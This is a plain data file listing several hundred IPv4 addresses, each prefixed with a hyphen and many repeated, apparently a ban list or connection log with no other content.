-115.159.56.154 -180.175.38.34 -115.218.125.113 -119.129.115.40 -111.26.164.22 -210.21.49.82 -101.70.65.216 -183.60.143.121 -220.180.10.211 -111.26.164.22 -122.157.103.164 -116.7.74.94 -210.176.89.51 -125.71.149.52 -221.210.146.29 -220.166.243.131 -111.26.164.22 -218.8.93.179 -111.26.164.22 -171.214.206.37 -27.210.131.246 -183.157.2.105 -120.79.191.162 -125.227.174.234 -114.242.236.150 -111.26.164.22 -47.112.196.213 -119.190.61.31 -113.92.164.47 -211.142.238.29 -211.72.17.147 -113.105.203.66 -183.15.90.19 -60.175.65.195 -81.70.80.147 -220.166.242.52 -112.226.111.26 -180.112.28.91 -171.104.120.50 -116.30.198.106 -116.7.72.6 -210.28.227.186 -125.107.157.247 -183.138.184.182 -117.146.13.74 -49.77.43.204 -121.8.145.133 -119.166.14.11 -36.27.165.92 -103.200.5.15 -39.106.10.131 -120.25.78.90 -183.156.233.87 -218.17.84.165 -180.140.74.199 -113.92.167.231 -111.26.164.22 -116.24.189.61 -111.38.109.44 -113.104.217.16 -119.129.115.123 -111.30.36.51 -122.245.86.130 -219.147.9.82 -114.223.68.149 -113.116.50.37 -125.89.34.171 -111.26.164.22 -101.65.82.167 -111.26.164.22 -120.78.172.188 -39.108.172.157 -115.208.34.0 -122.240.139.186 -120.24.36.140 -121.251.0.56 -112.91.87.2 -111.39.26.90 -180.140.75.35 -121.23.173.238 -120.1.2.128 -220.166.243.214 -171.214.206.101 -119.181.218.22 -183.157.2.151 -59.38.34.116 -112.74.74.152 -111.26.164.22 -183.138.144.223 -110.87.24.201 -211.141.174.244 -111.26.164.22 -59.46.229.205 -122.245.159.185 -117.40.91.158 -113.88.251.96 -111.26.164.22 -113.90.236.136 -111.198.143.219 -39.89.157.72 -111.26.164.22 -113.88.132.65 -183.27.182.5 -218.241.213.62 -110.64.96.22 -218.6.64.133 -61.166.162.209 -47.110.240.159 -113.116.132.50 -115.202.48.206 -58.247.111.14 -111.26.164.22 -111.26.164.22 -182.141.234.179 -125.125.23.206 -183.138.165.85 -36.26.207.67 -180.112.226.192 -120.224.86.38 -114.32.24.181 -120.35.100.210 -183.49.46.125 -39.65.172.141 -120.209.44.141 -113.116.133.108 -111.26.164.22 -117.89.162.71 -120.76.134.26 -222.128.63.89 -101.70.65.216 -183.230.62.166 -14.104.97.55 -115.219.76.183 -222.82.134.87 -180.109.39.156 -60.6.205.41 -122.243.216.183 -111.26.164.22 -153.99.240.152 -14.126.205.119 -120.24.152.237 -111.26.164.22 -61.166.162.74 -112.53.224.92 -49.73.185.245 -120.237.82.46 -111.26.164.22 -115.202.158.168 -125.89.32.115 -116.7.73.218 -183.27.180.249 -101.83.99.232 -113.85.102.223 -115.202.48.250 -125.89.32.129 -113.116.12.208 -180.140.75.0 -120.237.82.46 -220.163.44.26 -111.26.164.22 -116.7.74.223 -116.7.74.100 -60.189.121.216 -171.104.121.66 -61.166.162.50 -112.115.17.128 -171.214.206.156 -115.219.72.208 -116.25.135.154 -218.195.47.41 -183.159.43.101 -180.109.38.50 -47.115.189.96 -111.26.164.22 -183.149.237.235 -118.113.46.81 -221.215.224.164 -219.134.11.194 -60.162.18.216 -113.73.13.208 -111.26.164.22 -220.166.243.174 -122.231.18.170 -103.200.5.15 -122.245.80.184 -113.102.128.51 -113.116.44.219 -60.178.218.67 -113.119.8.22 -115.221.141.154 -183.156.236.61 -183.49.45.109 -220.191.70.22 -171.223.87.7 -182.141.233.185 -36.104.144.183 -110.185.218.118 -60.189.125.139 -125.69.91.193 -123.150.37.228 -112.74.132.138 -111.26.164.22 -222.185.26.115 -125.69.92.87 -111.26.164.22 -120.24.215.87 -183.146.102.179 -112.255.12.217 -111.26.164.22 -61.166.162.76 -111.26.164.22 -45.125.46.182 -113.88.250.84 -123.182.240.13 -139.159.218.34 -123.155.73.114 -47.103.56.241 -114.89.77.210 -14.104.101.147 -183.138.183.221 -120.76.165.6 -125.71.39.37 -203.75.190.29 -183.155.195.107 -221.130.129.196 -60.162.20.100 -120.24.165.78 -39.96.114.94 -61.132.135.151 -222.211.78.73 -113.85.100.228 -183.138.186.54 -59.42.89.185 -14.23.94.88 -1.192.147.48 -110.184.163.64 -113.90.236.34 -106.14.16.165 -115.219.232.152 -47.75.151.234 -110.185.192.218 -218.24.88.50 -211.140.220.45 -203.91.45.250 -220.180.238.237 -113.8.5.188 -60.25.210.213 -203.130.42.209 -115.219.74.77 -125.89.34.75 -114.115.162.178 -113.89.34.210 -171.214.206.92 -113.105.202.240 -36.24.12.11 -49.64.54.105 -14.23.61.4 -219.219.180.84 -49.77.42.210 -103.44.239.27 -113.87.163.69 -180.140.75.198 -14.126.206.152 -220.163.44.26 -221.220.102.69 -113.116.148.227 -120.76.214.204 -219.138.151.22 -222.77.185.52 -222.77.185.59 -222.77.185.60 -111.26.164.22 -113.85.102.189 -139.159.218.34 -120.79.146.214 -116.7.75.235 -120.79.22.205 -117.131.88.43 -115.219.1.165 -111.26.164.22 -60.178.182.64 -111.230.206.141 -116.7.75.189 -115.28.112.17 -42.194.230.238 -111.230.206.141 -112.25.161.238 -39.107.120.189 -111.230.206.141 -113.118.19.210 -42.194.230.238 -115.221.137.192 -111.230.206.141 -111.230.206.141 -111.230.206.141 -111.230.206.141 -111.230.206.141 -111.230.206.141 -119.145.4.171 -42.194.230.238 -116.7.73.138 -125.126.210.204 -42.194.230.238 -42.194.230.238 -111.230.206.141 -42.194.230.238 -111.26.164.22 -111.26.164.22 -123.159.115.49 -60.178.90.118 -42.194.230.238 -60.189.119.235 -111.230.206.141 -113.105.200.250 -111.230.206.141 -202.206.64.206 -42.194.230.238 -59.42.62.0 -113.116.5.110 -42.194.230.238 -111.230.206.141 -42.194.230.238 -42.194.230.238 -42.194.230.238 -42.194.230.238 -116.242.232.41 -111.230.206.141 -183.149.255.53 -114.84.146.173 -42.194.230.238 -113.105.200.75 -42.194.230.238 -42.194.230.238 -125.124.211.61 -111.230.206.141 -58.241.163.174 -116.24.64.189 -111.230.206.141 -42.194.230.238 -121.13.252.163 -111.230.206.141 -111.230.206.141 -111.230.206.141 -115.221.143.8 -14.126.206.165 -180.141.91.161 -113.71.155.71 -116.7.74.70 -42.194.230.238 -59.48.236.166 -42.56.191.229 -42.194.230.238 -113.116.124.41 -45.125.46.182 -42.194.230.238 -111.230.206.141 -111.230.206.141 -219.138.151.22 -120.25.98.223 -111.230.206.141 -59.42.63.198 -42.194.230.238 -111.230.206.141 -42.194.230.238 -117.24.203.71 -123.159.54.209 -113.8.5.10 -42.194.230.238 -42.194.230.238 -120.24.160.32 -123.155.73.180 -111.26.164.22 -113.85.103.145 -39.75.65.141 -103.73.66.210 -182.61.6.118 -113.87.163.69 -111.26.164.22 -111.230.206.141 -111.26.164.22 -42.194.230.238 -116.7.73.202 -124.172.246.211 -116.7.73.70 -42.194.230.238 -42.194.230.238 -47.111.8.75 -42.194.230.238 -125.112.110.232 -111.230.206.141 -60.189.98.204 -42.194.230.238 -42.194.230.238 -111.230.206.141 -210.51.21.62 -1.119.10.138 -111.230.206.141 -125.94.216.252 -115.218.69.119 -111.230.206.141 -42.194.230.238 -42.194.230.238 -111.230.206.141 -125.119.147.41 -42.194.230.238 -171.34.78.70 -111.230.206.141 -111.230.206.141 -112.226.111.26 -42.194.230.238 -111.230.206.141 -183.224.77.11 -111.26.164.22 -120.1.135.222 -183.240.171.42 -42.194.230.238 -180.97.199.224 -42.194.230.238 -58.33.88.26 -111.230.206.141 -111.230.206.141 -111.230.206.141 -111.230.206.141 -211.84.228.22 -42.194.230.238 -113.108.123.169 -122.143.203.19 -42.194.230.238 -42.194.230.238 -111.230.206.141 -183.234.39.71 -114.55.250.251 -111.230.206.141 -111.230.206.141 -222.77.185.55 -113.106.22.37 -219.136.173.131 -111.230.206.141 -39.98.223.177 -218.5.2.251 -111.230.206.141 -113.195.156.51 -111.230.206.141 -42.194.230.238 -103.36.90.49 -218.107.223.156 -42.194.230.238 -61.144.241.6 -111.230.206.141 -42.194.230.238 -182.92.65.20 -112.112.14.234 -111.230.206.141 -113.87.160.13 -14.29.84.77 -112.81.63.237 -42.194.230.238 -115.219.235.14 -111.164.184.165 -111.230.206.141 -122.245.86.184 -111.230.206.141 -218.22.185.86 -111.230.206.141 -121.61.118.56 -111.230.206.141 -111.230.206.141 -60.189.112.101 -113.195.156.51 -222.240.225.147 -111.230.206.141 -42.194.230.238 -219.131.221.174 -119.191.10.33 -120.1.135.222 -111.230.206.141 -115.218.126.201 -103.36.90.58 -111.230.206.141 -111.230.206.141 -42.194.230.238 -117.158.118.21 -42.194.230.238 -115.219.4.66 -42.194.230.238 -42.194.230.238 -111.230.206.141 -113.87.91.249 -124.172.188.14 -113.88.124.200 -219.138.151.22 -220.179.118.150 -122.137.242.96 -116.7.75.136 -122.245.84.3 -42.194.230.238 -125.89.34.153 -183.158.26.209 -42.194.230.238 -111.230.206.141 -111.230.206.141 -42.194.230.238 -221.207.27.199 -117.40.91.158 -112.26.163.142 -42.194.230.238 -42.194.230.238 -47.107.150.38 -122.112.251.170 -42.194.230.238 -125.107.174.116 -111.230.206.141 -182.61.6.118 -42.194.230.238 -110.191.211.61 -111.26.164.22 -113.87.162.18 -111.230.206.141 -122.112.234.128 -42.194.230.238 -42.194.230.238 -42.194.230.238 -116.10.125.143 -111.230.206.141 -42.194.230.238 -183.236.155.59 -180.141.91.161 -183.15.177.21 -115.203.18.41 -111.230.206.141 -122.224.174.178 -42.123.124.195 -210.28.227.186 -119.129.115.212 -42.194.230.238 -42.194.230.238 -14.104.99.153 -42.194.230.238 -183.143.74.173 -111.230.206.141 -113.8.5.31 -42.194.230.238 -106.13.79.31 -42.194.230.238 -180.142.178.80 -114.223.227.55 -42.194.230.238 -111.230.206.141 -59.50.85.212 -120.25.87.22 -210.6.161.10 -218.22.185.86 -111.230.206.141 -222.179.155.7 -111.230.206.141 -106.38.169.52 -42.194.230.238 -111.230.206.141 -42.194.230.238 -125.107.145.94 -111.230.206.141 -111.230.206.141 -111.230.206.141 -113.85.101.166 -120.78.13.43 -222.82.152.24 -180.141.91.161 -42.194.230.238 -111.230.206.141 -211.141.224.169 -120.78.214.14 -112.115.17.229 -60.162.11.151 -122.243.151.192 -14.146.72.106 -111.230.206.141 -42.194.230.238 -202.102.107.14 -111.230.206.141 -123.159.112.29 -111.230.206.141 -119.97.139.81 -42.194.230.238 -122.112.224.149 -101.16.142.29 -101.37.66.68 -111.230.206.141 -119.23.145.111 -218.74.6.238 -60.173.253.89 -60.173.82.68 -111.230.206.141 -116.128.228.13 -123.155.72.134 -42.194.230.238 -42.194.230.238 -116.128.228.13 -14.104.101.10 -14.155.223.190 -111.230.206.141 -111.230.206.141 -42.194.230.238 -125.89.35.2 -113.116.159.176 -111.230.206.141 -111.26.164.22 -103.36.90.50 -180.141.91.161 -219.142.111.118 -120.77.106.25 -115.202.43.168 -111.230.206.141 -123.155.72.134 -111.230.206.141 -111.230.206.141 -220.166.240.33 -119.129.118.182 -111.230.206.141 -113.87.163.7 -60.189.102.80 -183.138.184.144 -222.246.135.202 -111.230.206.141 -103.36.90.58 -110.251.239.103 -115.219.239.168 -42.194.230.238 -125.118.17.134 -111.26.164.22 -116.7.74.194 -111.26.164.22 -42.194.230.238 -118.112.91.253 -183.138.184.159 -58.56.187.82 -114.55.3.7 -111.230.206.141 -42.194.230.238 -42.194.230.238 -113.116.135.237 -113.87.161.19 -42.194.230.238 -183.234.132.70 -183.157.3.62 -111.26.164.22 -42.194.230.238 -112.115.17.238 -111.230.206.141 -171.217.83.223 -110.87.24.50 -115.207.238.135 -111.230.206.141 -47.105.75.196 -59.38.32.35 -42.194.230.238 -42.194.230.238 -117.29.167.138 -183.136.100.91 -42.194.230.238 -112.31.26.65 -117.157.67.161 -222.246.135.203 -113.204.166.76 -180.140.75.24 -42.194.230.238 -120.204.195.112 -14.104.101.178 -119.18.224.86 -61.144.225.17 -183.138.148.253 -111.230.206.141 -119.18.224.93 -123.124.150.194 -60.162.12.176 -171.214.206.15 -111.230.206.141 -60.162.23.233 -113.116.88.111 -113.69.137.71 -202.203.16.18 -119.18.224.84 -113.85.103.173 -203.69.238.225 -122.144.178.202 -42.194.230.238 -42.194.230.238 -61.145.111.6 -61.145.111.29 -42.194.230.238 -59.50.76.152 -120.224.0.48 -42.194.230.238 -61.166.162.112 -180.112.227.230 -113.87.90.57 -123.235.225.237 -119.52.63.106 -58.37.230.147 -112.64.187.68 -42.194.230.238 -103.73.66.210 -119.129.114.61 -111.230.206.141 -111.230.206.141 -111.230.206.141 -111.230.206.141 -42.194.230.238 -116.255.201.5 -42.194.230.238 -42.194.230.238 -42.194.230.238 -42.194.230.238 -211.103.134.27 -42.194.230.238 -111.230.206.141 -111.230.206.141 -112.26.6.73 -220.188.43.41 -60.162.166.137 -14.126.204.255 -183.158.61.25 -111.230.206.141 -111.230.206.141 -36.26.226.234 -42.194.230.238 -183.143.90.4 -183.15.178.102 -42.194.230.238 -202.101.216.23 -114.215.252.161 -111.230.206.141 -171.214.206.27 -125.120.252.168 -42.194.230.238 -60.162.10.37 -60.189.97.215 -111.230.206.141 -183.156.168.31 -42.194.230.238 -61.187.93.76 -222.178.189.181 -14.145.88.40 -121.37.206.104 -113.110.203.140 -42.194.230.238 -101.37.158.170 -42.194.230.238 -42.194.230.238 -120.35.103.240 -113.118.72.9 -116.7.75.80 -111.230.206.141 -115.197.127.82 -218.241.213.57 -58.37.230.147 -111.230.206.141 -183.14.82.103 -106.12.43.4 -222.87.19.14 -222.87.19.14 -116.7.72.78 -113.110.184.69 -175.99.134.73 -60.178.216.194 -122.228.19.76 -14.104.100.68 -111.230.206.141 -14.155.222.191 -121.224.119.106 -210.176.53.196 -121.37.206.104 -36.249.126.176 -123.159.113.17 -183.136.119.29 -14.126.204.185 -202.196.96.164 -202.196.96.164 -202.196.96.164 -125.122.9.65 -202.196.96.164 -202.196.96.164 -221.4.210.189 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -116.30.198.12 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -139.198.176.47 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -111.230.206.141 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -42.194.230.238 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -42.194.230.238 -202.196.96.164 -117.15.235.80 -202.196.96.164 -202.196.96.164 -221.209.35.203 -202.196.96.164 -202.196.96.164 -180.142.179.238 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -115.218.123.91 -116.233.204.208 -202.196.96.164 -202.196.96.164 -124.117.221.58 -202.196.96.164 -202.196.96.164 -202.196.96.164 -123.155.76.147 -123.207.161.58 -202.196.96.164 -60.162.163.48 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -218.90.190.106 -120.238.130.181 -202.196.96.164 -202.196.96.164 -124.119.17.206 -202.196.96.164 -202.196.96.164 -202.196.96.164 -111.230.206.141 -61.182.241.251 -202.196.96.164 -202.196.96.164 -42.194.230.238 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -120.35.101.123 -202.196.96.164 -202.196.96.164 -111.26.164.22 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -119.188.255.140 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -111.230.206.141 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -113.12.112.218 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -42.194.230.238 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -61.130.96.246 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -60.162.6.5 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -112.243.209.35 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -183.15.88.122 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -27.184.34.255 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -112.30.53.158 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -101.16.75.158 -202.196.96.164 -47.108.61.66 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -115.174.67.102 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -106.14.247.240 -202.196.96.164 -210.42.225.50 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -60.210.112.90 -202.196.96.164 -202.196.96.164 -202.196.96.164 -60.162.19.48 -202.196.96.164 -202.196.96.164 -202.196.96.164 -125.107.176.98 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -14.155.221.107 -202.196.96.164 -218.94.26.15 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -180.112.231.59 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -47.93.119.234 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -14.126.205.190 -202.196.96.164 -202.196.96.164 -202.196.96.164 -124.128.8.187 -202.196.96.164 -202.196.96.164 -123.159.54.55 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -36.24.87.95 -202.196.96.164 -202.196.96.164 -14.126.205.60 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -59.152.251.140 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -119.181.233.42 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -116.63.87.176 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -114.84.144.104 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -60.162.6.92 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -171.214.206.43 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -116.25.135.9 -202.196.96.164 -202.196.96.164 -122.243.149.111 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -60.6.218.182 -202.196.96.164 -202.196.96.164 -183.49.46.255 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -119.96.172.232 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -183.27.181.209 -202.196.96.164 -121.225.229.105 -222.85.144.89 -112.227.161.118 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -47.108.148.2 -202.196.96.164 -180.166.124.214 -115.174.67.118 -220.166.240.209 -202.196.96.164 -202.196.96.164 -202.196.96.164 -14.145.36.26 -202.196.96.164 -60.162.165.91 -122.245.157.79 -116.54.81.157 -113.116.126.49 -202.196.96.164 -202.196.96.164 -60.18.143.13 -202.196.96.164 -101.70.67.117 -202.196.96.164 -59.42.63.168 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -113.88.118.237 -183.149.246.48 -202.196.96.164 -202.196.96.164 -202.196.96.164 -121.227.0.142 -36.25.97.119 -202.196.96.164 -202.196.96.164 -202.196.96.164 -183.138.139.171 -222.82.157.110 -202.196.96.164 -218.0.175.28 -202.196.96.164 -221.196.48.119 -202.196.96.164 -114.84.144.104 -202.196.96.164 -202.196.96.164 -171.214.206.52 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -119.129.113.156 -116.7.75.187 -14.126.206.252 -202.196.96.164 -60.13.182.137 -115.174.67.108 -111.204.231.76 -210.242.49.248 -60.162.6.197 -202.196.96.164 -113.85.103.56 -14.145.36.84 -101.72.135.24 -111.164.177.227 -202.196.96.164 -202.196.96.164 -202.196.96.164 -202.196.96.164 -112.226.136.144 -59.32.215.7 -115.208.186.179 -202.196.96.164 -202.196.96.164 -14.104.102.90 -202.196.96.164 -61.183.153.118 -202.196.96.164 -202.196.96.164 -220.191.59.50 -120.209.157.73 -125.69.92.39 -112.30.184.208 -106.13.126.14 -60.189.120.37 -61.181.125.5 -103.36.90.54 -210.242.49.248 -47.103.144.5 -60.209.93.166 -180.212.166.88 -115.218.70.110 -114.89.77.208 -110.185.218.123 -122.227.53.253 -221.130.124.61 -115.203.25.37 -183.146.97.250 -218.94.104.207 -218.6.203.200 -218.6.203.197 -123.234.88.116 -60.190.176.78 -202.196.96.164 -202.196.96.164 -116.9.30.210 -124.78.253.7 -202.196.96.164 -182.245.143.217 -60.190.176.77 -122.245.86.202 -61.57.227.160 -222.186.32.250 -157.122.144.26 -202.196.96.164 -14.104.99.249 -202.196.96.164 -202.196.96.164 -180.140.74.245 -58.210.0.41 -125.69.92.41 -219.144.186.58 -61.158.168.173 -202.196.96.164 -220.128.242.127 -117.40.9.25 -202.196.96.164 -202.196.96.164 -202.196.96.164 -210.242.49.248 -116.7.73.151 -119.129.128.203 -202.196.96.164 -202.196.96.164 -113.116.2.44 -171.214.206.203 -113.102.130.71 -180.109.145.79 -14.155.223.212 -202.196.96.164 -183.49.44.228 -218.23.6.51 -202.196.96.164 -42.247.3.9 -202.196.96.164 -220.130.199.140 -202.196.96.164 -202.196.96.164 -202.196.96.164 -210.28.231.180 -202.196.96.164 -47.91.235.169 -114.251.49.141 -220.135.117.3 -49.235.50.54 -60.189.115.171 -61.141.138.120 -223.93.140.182 -61.190.27.61 -202.196.96.164 -59.46.166.45 -210.242.49.248 -202.196.96.164 -223.93.140.181 -115.218.67.207 -223.93.140.180 -223.93.140.178 -223.93.140.179 -202.196.96.164 -218.242.71.73 -112.94.5.91 -218.241.213.60 -58.18.37.154 -210.242.49.248 -202.196.96.164 -202.196.96.164 -202.196.96.164 -111.207.179.11 -119.190.38.2 -202.196.96.164 -202.196.96.164 -101.83.124.163 -61.129.181.125 -113.88.140.104 -202.196.96.164 -202.196.96.164 -210.29.183.47 -60.248.133.235 -59.42.60.193 -219.243.117.185 -183.146.98.30 -36.25.166.247 -103.73.66.210 -202.196.96.164 -101.229.74.199 -202.196.96.164 -220.166.243.92 -202.196.96.164 -119.254.65.39 -119.254.65.46 -60.247.32.29 -47.102.218.85 -202.196.96.164 -119.254.65.53 -202.196.96.164 -113.88.140.74 -202.196.96.164 -125.125.65.150 -202.196.96.164 -211.139.119.150 -202.196.96.164 -101.65.83.42 -39.75.189.28 -124.90.34.135 -202.196.96.164 -202.100.78.130 -119.146.190.66 -103.235.227.129 -14.146.224.121 -202.196.96.164 -218.32.238.246 -119.254.65.54 -119.254.65.50 -119.254.65.40 -119.254.65.51 -119.254.65.38 -119.254.65.52 -222.75.167.185 -183.27.180.169 -202.196.96.164 -221.220.148.139 -202.196.96.164 -116.22.199.168 -202.196.96.164 -119.188.254.200 -119.188.255.60 -119.188.254.160 -119.188.254.140 -119.188.254.150 -119.188.254.190 -119.188.255.120 -119.188.254.20 -220.128.239.14 -119.188.255.100 -119.188.255.210 -119.188.255.70 -119.188.255.180 -119.188.255.200 -119.188.255.170 -119.188.255.250 -119.188.255.180 -119.188.255.170 -116.7.73.126 -47.111.243.7 -220.184.35.133 -101.65.80.17 -222.79.254.29 -202.196.96.164 -119.188.255.220 -119.188.255.140 -119.188.255.150 -119.188.255.110 -119.188.255.160 -119.188.255.120 -119.188.255.230 -119.188.255.80 -119.188.255.130 -119.188.255.190 -119.188.255.90 -119.188.254.190 -119.188.254.220 -119.188.254.180 -119.188.254.170 -119.188.254.150 -119.188.254.160 -119.188.254.210 -119.188.254.250 -202.196.96.164 -119.188.254.230 -119.188.254.240 -119.188.254.220 -221.239.149.134 -119.188.254.140 -119.188.255.110 -119.188.255.100 -119.188.255.90 -125.107.152.213 -220.191.63.37 -218.22.191.82 -119.188.255.80 -111.164.177.133 -211.143.18.139 -106.38.36.91 -49.235.120.206 -119.188.254.250 -119.188.254.210 -119.188.254.170 -119.188.254.180 -171.88.103.249 -119.188.255.240 -119.188.255.70 -119.188.255.60 -119.188.254.240 -119.188.254.230 -119.188.254.200 -125.113.182.209 -116.7.73.49 -116.236.237.234 -113.85.103.111 -218.29.107.99 -61.141.138.108 -153.99.240.213 -125.125.36.5 -180.212.167.61 -202.196.96.164 -183.49.45.9 -114.88.157.247 -171.214.206.77 -202.196.96.164 -202.196.96.164 -120.197.60.214 -120.221.95.43 -221.209.38.104 -124.16.134.55 -60.162.165.137 -221.239.149.131 -202.196.96.164 -222.178.41.222 -81.70.13.163 -183.158.229.208 -202.101.235.103 -183.138.146.112 -202.119.81.192 -115.219.74.225 -110.189.91.194 -218.58.50.8 -221.213.162.248 -202.196.96.164 -202.105.183.147 -58.56.156.131 -14.145.90.6 -220.174.161.172 -47.100.13.144 -202.196.96.164 -222.75.145.186 -221.226.101.250 -58.19.210.49 -61.141.64.48 -202.196.96.164 -220.163.114.46 -183.158.213.208 -36.25.126.217 -113.92.164.24 -202.196.96.164 -117.62.165.100 -60.189.121.250 -117.50.49.119 -116.243.86.220 -59.42.229.234 -116.232.104.194 -59.42.230.228 -202.196.96.164 -183.27.181.83 -222.187.132.3 -14.21.70.253 -58.16.249.79 -210.42.160.57 -183.129.189.109 -101.16.242.60 -121.40.61.57 -113.116.44.134 -116.7.74.59 -60.162.11.38 -202.196.96.164 -124.162.128.2 -14.155.223.142 -113.88.135.119 -211.141.213.168 -218.23.170.96 -111.205.158.11 -115.224.79.205 -116.24.190.193 -114.255.239.175 -202.127.26.210 -222.80.142.106 -221.209.40.250 -113.102.130.55 -183.149.240.200 -113.119.8.108 